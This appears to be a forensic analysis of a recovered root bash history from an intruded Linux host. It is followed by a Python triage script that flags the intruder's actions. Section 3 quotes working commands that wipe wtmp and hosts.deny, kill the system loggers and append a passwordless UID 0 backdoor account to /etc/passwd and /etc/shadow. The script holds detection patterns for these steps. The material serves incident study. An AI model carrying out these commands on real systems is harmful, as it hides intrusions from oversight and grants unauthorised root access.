[--] /root/.bash_history

This file was extracted from /dev/hda8 using strings, grep and common sense. It can be divided into three sections, where 'exit' works as a session delimiter.

Section 1: Admin activity, a few seconds after the startup.
---------------------------------------------------------------------------
mkdir /floppy
mount /dev/fd0 /floppy
cd /floppy
rm *gz
./init
umount /floppy
exit
---------------------------------------------------------------------------

Section 2: Still admin activity, configuring the network adapter.
---------------------------------------------------------------------------
ifconfig -a
cd /etc/sysconfig
vi network
cd *pts
cd ../net*pts
vi *eth0
ifconfig eth0 172.16.1.107 broadcst 172.16.1.255 netmask 255.255.255.0 up
ifconfig -a
ifconfig eth0 broadcast 172.16.1.255
ifconfig eht0 netmask 255.255.255.0
ifconfig eth0 netmask 255.255.255.0
ifconfig -a
route add default gw 172.16.1.254
netstat -nr
exit
---------------------------------------------------------------------------

Section 3: BLACKHAT ACTIVITY. First he emptied hosts.deny and wtmp (removed and recreated them), then killed klogd and syslogd and deleted their init scripts so they would not start again at boot. He added two users: own (a root equivalent, UID 0, with no password) and adm1 (a regular user) with the password 'elitenes'. Finally he checked inetd.conf to make sure telnet was enabled, so that he would be able to get back into the machine.
---------------------------------------------------------------------------
uptime
rm -rf /etc/hosts.deny
touch /etc/hosts.deny
rm -rf /var/log/wtmp
touch /var/log/wtmp
killall -9 klogd
killall -9 syslogd
rm -rf /etc/rc.d/init.d/*log*
echo own:x:0:0::/root:/bin/bash >> /etc/passwd
echo adm1:x:5000:5000:Tech Admin:/tmp:/bin/bash >> /etc/passwd
echo own::10865:0:99999:7:-1:-1:134538460 >> /etc/shadow
echo adm1:Yi2yCGHo0wOwg:10884:0:99999:7:-1:-1:134538412 >> /etc/shadow
cat /etc/inetd.conf | grep tel
exit
---------------------------------------------------------------------------
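The session split and the indicators described above (log truncation, killed loggers, a hand-appended UID 0 account, an empty shadow password field) can be mechanised for triage of a recovered history. The following is an added example written for this write-up, not part of the original analysis; the sample history is a constructed abbreviation of the one recovered here, and the rule patterns are the author's own choice.

```python
import re

# Constructed sample of the recovered history ('exit' ends a session); admin part abbreviated.
SAMPLE_HISTORY = """\
mkdir /floppy
exit
rm -rf /etc/hosts.deny
touch /etc/hosts.deny
rm -rf /var/log/wtmp
touch /var/log/wtmp
killall -9 klogd
killall -9 syslogd
rm -rf /etc/rc.d/init.d/*log*
echo own:x:0:0::/root:/bin/bash >> /etc/passwd
echo adm1:x:5000:5000:Tech Admin:/tmp:/bin/bash >> /etc/passwd
echo own::10865:0:99999:7:-1:-1:134538460 >> /etc/shadow
echo adm1:Yi2yCGHo0wOwg:10884:0:99999:7:-1:-1:134538412 >> /etc/shadow
exit
"""

# Anti-forensic patterns from section 3, plus a record echoed straight into passwd/shadow.
RULES = [("log-tamper", re.compile(r"^(rm|touch)\b.*(/var/log/|hosts\.deny|/init\.d/\S*log)")),
         ("logger-kill", re.compile(r"^killall\b.*\b(syslogd|klogd)\b"))]
ECHO_APPEND = re.compile(r"^echo\s+(.+?)\s*>>\s*(/etc/passwd|/etc/shadow)$")  # (record, file)

def split_sessions(history):
    """Split the history into sessions, using a bare 'exit' as the delimiter."""
    sessions = [[]]
    for cmd in filter(None, map(str.strip, history.splitlines())):
        if cmd == "exit":
            sessions.append([])
        else:
            sessions[-1].append(cmd)
    return [s for s in sessions if s]  # drop the empty tail after the final 'exit'

def flag_command(cmd):
    """Return indicator labels for one command; an empty list means nothing notable."""
    hits = [label for label, rx in RULES if rx.match(cmd)]
    m = ECHO_APPEND.match(cmd)
    if m:  # account record appended by hand: inspect the echoed fields
        f, target = m.group(1).split(":"), m.group(2)
        if target == "/etc/passwd" and len(f) > 2 and f[2] == "0" and f[0] != "root":
            hits.append("uid0-account:" + f[0])
        elif target == "/etc/shadow" and len(f) > 1 and f[1] == "":
            hits.append("empty-password:" + f[0])
    return hits

def triage(history):
    return [[h for cmd in s for h in flag_command(cmd)] for s in split_sessions(history)]
```

Run against the real file, the admin sessions produce no labels while the third session lights up on every category, which is the same conclusion the manual reading reaches.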